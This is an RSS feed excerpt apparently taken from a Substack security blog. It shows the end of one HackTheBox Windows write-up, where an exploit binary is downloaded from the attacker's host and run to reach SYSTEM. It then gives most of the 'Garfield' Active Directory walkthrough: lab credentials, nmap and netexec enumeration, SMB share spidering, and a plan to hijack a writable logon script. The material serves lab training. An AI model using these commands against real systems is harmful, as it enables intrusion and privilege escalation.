&#9492;&#9472;$ ll                                                                                                              
total 284
-rw-r--r-- 1 root root   3457 Apr  4 11:33 pwn.c
-rwxr-xr-x 1 root root 257644 Apr  4 11:34 pwn.exe
. . .[SNIP]. . .</code></pre></div><p>Then ready to be downloaded and executed!!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">PS C:\programdata&gt; iwr -uri http://10.10.14.20/pwn.exe -outfile pwn.exe
iwr -uri http://10.10.14.20/pwn.exe -outfile pwn.exe
PS C:\programdata&gt; .\pwn.exe
.\pwn.exe
Microsoft Windows [Version 10.0.19045.6216]
(c) Microsoft Corporation. All rights reserved.

C:\programdata&gt;whoami
whoami
nt authority\system

C:\programdata&gt;hostname
hostname
reaper</code></pre></div><p>That&#8217;s it, we&#8217;re SYSTEM now!!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ZVrf!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3187bf30-4ac7-48fc-a7a4-36dd7d192435_880x373.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ZVrf!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3187bf30-4ac7-48fc-a7a4-36dd7d192435_880x373.png 424w, https://substackcdn.com/image/fetch/$s_!ZVrf!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3187bf30-4ac7-48fc-a7a4-36dd7d192435_880x373.png 848w, https://substackcdn.com/image/fetch/$s_!ZVrf!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3187bf30-4ac7-48fc-a7a4-36dd7d192435_880x373.png 1272w, https://substackcdn.com/image/fetch/$s_!ZVrf!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3187bf30-4ac7-48fc-a7a4-36dd7d192435_880x373.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ZVrf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3187bf30-4ac7-48fc-a7a4-36dd7d192435_880x373.png" width="880" height="373" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3187bf30-4ac7-48fc-a7a4-36dd7d192435_880x373.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:373,&quot;width&quot;:880,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:91171,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193173592?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3187bf30-4ac7-48fc-a7a4-36dd7d192435_880x373.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ZVrf!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3187bf30-4ac7-48fc-a7a4-36dd7d192435_880x373.png 424w, https://substackcdn.com/image/fetch/$s_!ZVrf!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3187bf30-4ac7-48fc-a7a4-36dd7d192435_880x373.png 848w, https://substackcdn.com/image/fetch/$s_!ZVrf!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3187bf30-4ac7-48fc-a7a4-36dd7d192435_880x373.png 1272w, https://substackcdn.com/image/fetch/$s_!ZVrf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3187bf30-4ac7-48fc-a7a4-36dd7d192435_880x373.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ul><li><p><a href="https://labs.hackthebox.com/achievement/machine/2489228/706">labs.hackthebox.com/achievement/machine/2489228/706</a></p></li></ul><p>Until next time and Happy Hacking!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[HTB Garfield - Windows (Hard)]]></title><description><![CDATA[Dual Admin machine, find and Hijack SMB to gain access, discover second domain. Gain local user with password reset get second domain with RBCD, gain main DC with delegations and Golden ticket attack.]]></description><link>https://byt3n33dl3.substack.com/p/htb-garfield-windows-hard</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/htb-garfield-windows-hard</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Mon, 27 Apr 2026 13:51:03 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!7l3r!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F999127e7-2839-4aa8-b4e5-da253f837183_825x527.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7l3r!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F999127e7-2839-4aa8-b4e5-da253f837183_825x527.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7l3r!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F999127e7-2839-4aa8-b4e5-da253f837183_825x527.png 424w, https://substackcdn.com/image/fetch/$s_!7l3r!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F999127e7-2839-4aa8-b4e5-da253f837183_825x527.png 848w, https://substackcdn.com/image/fetch/$s_!7l3r!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F999127e7-2839-4aa8-b4e5-da253f837183_825x527.png 1272w, https://substackcdn.com/image/fetch/$s_!7l3r!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F999127e7-2839-4aa8-b4e5-da253f837183_825x527.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7l3r!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F999127e7-2839-4aa8-b4e5-da253f837183_825x527.png" width="825" height="527" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/999127e7-2839-4aa8-b4e5-da253f837183_825x527.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:527,&quot;width&quot;:825,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:186434,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193328954?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F999127e7-2839-4aa8-b4e5-da253f837183_825x527.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!7l3r!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F999127e7-2839-4aa8-b4e5-da253f837183_825x527.png 424w, https://substackcdn.com/image/fetch/$s_!7l3r!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F999127e7-2839-4aa8-b4e5-da253f837183_825x527.png 848w, https://substackcdn.com/image/fetch/$s_!7l3r!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F999127e7-2839-4aa8-b4e5-da253f837183_825x527.png 1272w, https://substackcdn.com/image/fetch/$s_!7l3r!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F999127e7-2839-4aa8-b4e5-da253f837183_825x527.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><em>From HTB: -</em></p><p>This write-up is going to be fast-forward:</p><ul><li><p>Gain User</p></li><li><p>Gain NT SYSTEM</p></li></ul><p>An assumed breach scenario so we start with a creds:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">user: j.arbuckle
passwd: Th1sD4mnC4t!@1978</code></pre></div><ol><li><p><em>Network Enumeration and Port Discovery</em></p></li></ol><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;c0d79174-76f7-4f14-878e-3b8f309fd0e8&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ping -c2 10.129.195.37
PING 10.129.195.37 (10.129.195.37) 56(84) bytes of data.
64 bytes from 10.129.195.37: icmp_seq=1 ttl=127 time=384 ms
64 bytes from 10.129.195.37: icmp_seq=2 ttl=127 time=389 ms

--- 10.129.195.37 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 384.445/386.736/389.028/2.291 ms</code></pre></div><p>Continue with Nmap Scan:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p- --min-rate 8000 10.129.195.37 -oA nmap/nmap              
Starting Nmap 7.98 ( https://nmap.org ) at
Nmap scan report for 10.129.195.37
Host is up (0.39s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
2179/tcp  open  vmrdp
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49899/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 17.78 seconds</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p53,88,135,139,389,445,464,593,636,2179,3268-3269,3389,5985,9389 -sC -sV 10.129.195.37 -oA nmap/nmap-ports
Starting Nmap 7.98 ( https://nmap.org ) at
Nmap scan report for 10.129.195.37
Host is up (0.48s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: )
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: garfield.htb, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2179/tcp open  vmrdp?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: garfield.htb, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.garfield.htb
| Not valid before: 
|_Not valid after:
|_ssl-date: ; +8h04m04s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: GARFIELD
|   NetBIOS_Domain_Name: GARFIELD
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: garfield.htb
|   DNS_Computer_Name: DC01.garfield.htb
|   DNS_Tree_Name: garfield.htb
|   Product_Version: 10.0.17763
|_  System_Time:
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8h04m04s, deviation: 0s, median: 8h04m03s
| smb2-time: 
|   date: 
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><p>Pretty much there&#8217;s a lot in here, even RDP are available, more than that we also got our domain:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">DC01.garfield.htb DC01 garfield.htb</code></pre></div><p>So put it local.</p><p>Notes:</p><ul><li><p>Clock SKEW gonna be brutal upon Kerberos</p></li><li><p>High Potential Spray</p></li></ul><ol start="2"><li><p><em>Protocols Enumeration with Credential</em></p></li></ol><p>With the credential we check what we&#8217;ve got:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap DC01.garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' 
LDAP        10.129.195.37   389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:garfield.htb) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.195.37   389    DC01             [+] garfield.htb\j.arbuckle:Th1sD4mnC4t!@1978</code></pre></div><p>Moreover user J.Arbuckle can auth on:</p><ul><li><p>SMB</p></li><li><p>LDAP</p></li><li><p>RDP</p></li></ul><p>But not logon, we can have much users from here:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap DC01.garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' --users
LDAP        10.129.195.37   389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:garfield.htb) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.195.37   389    DC01             [+] garfield.htb\j.arbuckle:Th1sD4mnC4t!@1978 
LDAP        10.129.195.37   389    DC01             [*] Enumerated 7 domain users: garfield.htb
LDAP        10.129.195.37   389    DC01             -Username-                    -Last PW Set-       -BadPW-  -Description-                                               
LDAP        10.129.195.37   389    DC01             Administrator                 2025-10-03 13:29:26 0        Built-in account for administering the computer/domain      
LDAP        10.129.195.37   389    DC01             Guest                         &lt;never&gt;             0        Built-in account for guest access to the computer/domain    
LDAP        10.129.195.37   389    DC01             krbtgt                        2025-08-13 07:05:26 0        Key Distribution Center Service Account                     
LDAP        10.129.195.37   389    DC01             krbtgt_8245                   2025-08-17 07:33:39 0        Key Distribution Center service account for read-only domain controller
LDAP        10.129.195.37   389    DC01             j.arbuckle                    2025-09-09 11:50:55 0                                                                    
LDAP        10.129.195.37   389    DC01             l.wilson                      2026-01-27 16:40:33 0                                                                    
LDAP        10.129.195.37   389    DC01             l.wilson_adm                  2026-01-13 09:56:35 2</code></pre></div><ol start="3"><li><p><em>Discover and Attack SMB Hijack</em></p></li></ol><p>Further more we discover SMB shares, not much, we found a batch (.bat) files but on NetExec views we only saw &#8220;READ&#8220; access:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" netexec smb DC01.garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' --shares
SMB         10.129.195.37   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:garfield.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.195.37   445    DC01             [+] garfield.htb\j.arbuckle:Th1sD4mnC4t!@1978 
SMB         10.129.195.37   445    DC01             [*] Enumerated shares
SMB         10.129.195.37   445    DC01             Share           Permissions     Remark
SMB         10.129.195.37   445    DC01             -----           -----------     ------
SMB         10.129.195.37   445    DC01             ADMIN$                          Remote Admin
SMB         10.129.195.37   445    DC01             C$                              Default share
SMB         10.129.195.37   445    DC01             IPC$            READ            Remote IPC
SMB         10.129.195.37   445    DC01             NETLOGON        READ            Logon server share 
SMB         10.129.195.37   445    DC01             SYSVOL          READ            Logon server share</code></pre></div><p>-M spider_plus modules:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" netexec smb DC01.garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' --shares -M spider_plus
SMB         10.129.195.37   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:garfield.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.195.37   445    DC01             [+] garfield.htb\j.arbuckle:Th1sD4mnC4t!@1978 
SPIDER_PLUS 10.129.195.37   445    DC01             [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.195.37   445    DC01             [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.195.37   445    DC01             [*]     STATS_FLAG: True
SPIDER_PLUS 10.129.195.37   445    DC01             [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.195.37   445    DC01             [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.195.37   445    DC01             [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.195.37   445    DC01             [*]  OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus
SMB         10.129.195.37   445    DC01             [*] Enumerated shares
SMB         10.129.195.37   445    DC01             Share           Permissions     Remark
SMB         10.129.195.37   445    DC01             -----           -----------     ------
SMB         10.129.195.37   445    DC01             ADMIN$                          Remote Admin
SMB         10.129.195.37   445    DC01             C$                              Default share
SMB         10.129.195.37   445    DC01             IPC$            READ            Remote IPC
SMB         10.129.195.37   445    DC01             NETLOGON        READ            Logon server share 
SMB         10.129.195.37   445    DC01             SYSVOL          READ            Logon server share 
SPIDER_PLUS 10.129.195.37   445    DC01             [+] Saved share-file metadata to "/root/.nxc/modules/nxc_spider_plus/10.129.195.37.json".
SPIDER_PLUS 10.129.195.37   445    DC01             [*] SMB Shares:           5 (ADMIN$, C$, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.129.195.37   445    DC01             [*] SMB Readable Shares:  3 (IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.129.195.37   445    DC01             [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.129.195.37   445    DC01             [*] Total folders found:  20
SPIDER_PLUS 10.129.195.37   445    DC01             [*] Total files found:    8
SPIDER_PLUS 10.129.195.37   445    DC01             [*] File size average:    1.08 KB
SPIDER_PLUS 10.129.195.37   445    DC01             [*] File size min:        22 B
SPIDER_PLUS 10.129.195.37   445    DC01             [*] File size max:        3.81 KB
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo cat /root/.nxc/modules/nxc_spider_plus/10.129.195.37.json                                                                                   
{
    "NETLOGON": {
        "printerDetect.bat": {
            "atime_epoch": "2025-09-12 18:20:28",
            "ctime_epoch": "2025-09-12 18:20:17",
            "mtime_epoch": "2025-09-12 18:25:38",
            "size": "217 B"
        }
    },
    "SYSVOL": {
        "garfield.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
            "atime_epoch": "2025-09-09 11:55:03",
            "ctime_epoch": "2025-08-13 07:04:48",
            "mtime_epoch": "2025-09-09 11:55:03",
            "size": "22 B"
        },
        "garfield.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2025-09-09 11:55:03",
            "ctime_epoch": "2025-08-13 07:04:48",
            "mtime_epoch": "2025-09-09 11:55:03",
            "size": "1.07 KB"
        },
        "garfield.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2025-08-13 07:11:08",
            "ctime_epoch": "2025-08-13 07:11:08",
            "mtime_epoch": "2025-08-13 07:11:08",
            "size": "2.73 KB"
        },
        "garfield.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
            "atime_epoch": "2026-02-13 20:14:50",
            "ctime_epoch": "2025-08-13 07:04:48",
            "mtime_epoch": "2026-02-13 20:14:50",
            "size": "23 B"
        },
        "garfield.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/Audit/audit.csv": {
            "atime_epoch": "2025-09-09 12:44:34",
            "ctime_epoch": "2025-09-09 12:44:17",
            "mtime_epoch": "2025-09-09 12:44:34",
            "size": "535 B"
        },
        "garfield.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2026-02-13 20:14:50",
            "ctime_epoch": "2025-08-13 07:04:48",
            "mtime_epoch": "2026-02-13 20:14:50",
            "size": "3.81 KB"
        },
        "garfield.htb/scripts/printerDetect.bat": {
            "atime_epoch": "2025-09-12 18:20:28",
            "ctime_epoch": "2025-09-12 18:20:17",
            "mtime_epoch": "2025-09-12 18:25:38",
            "size": "217 B"
        }
    }
} </code></pre></div><p>Getting the files:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">smb: \&gt; cd garfield.htb/scripts/
smb: \garfield.htb\scripts\&gt; get printerDetect.bat 
getting file \garfield.htb\scripts\printerDetect.bat of size 217 as printerDetect.bat (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \garfield.htb\scripts\&gt;
. . .[SNIP]. . .

&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo smbclient \\\\DC01.garfield.htb\\NETLOGON -U j.arbuckle --password 'Th1sD4mnC4t!@1978'
Try "help" to get a list of possible commands.
smb: \&gt; ls
  .                                   D        0  Tue Jan 27 17:13:47 2026
  ..                                  D        0  Tue Jan 27 17:13:47 2026
  printerDetect.bat                   A      217  Fri Sep 12 18:20:29 2025

                9250815 blocks of size 4096. 976901 blocks available
smb: \&gt; get printerDetect.bat 
getting file \printerDetect.bat of size 217 as printerDetect.bat (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)</code></pre></div><p>Inside the batch file:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ cat printerDetect.bat 
@echo off
echo Detecting installed printers...
echo ==============================

wmic printer get Name,DeviceID,PortName,DriverName,Shared,Status /format:table

echo.
echo Printer detection completed.
pause                                                        
                                                                                                                                           
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ cat pD.bat           
@echo off
echo Detecting installed printers...
echo ==============================

wmic printer get Name,DeviceID,PortName,DriverName,Shared,Status /format:table

echo.
echo Printer detection completed.
pause</code></pre></div><p>However we discover that we actually have write access, meaning we can put another batch file and potentially trigger it or wait until local users opens it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo smbcacls //DC01/SYSVOL garfield.htb/scripts -U j.arbuckle --password 'Th1sD4mnC4t!@1978'
REVISION:1
CONTROL:SR|PD|DI|DP
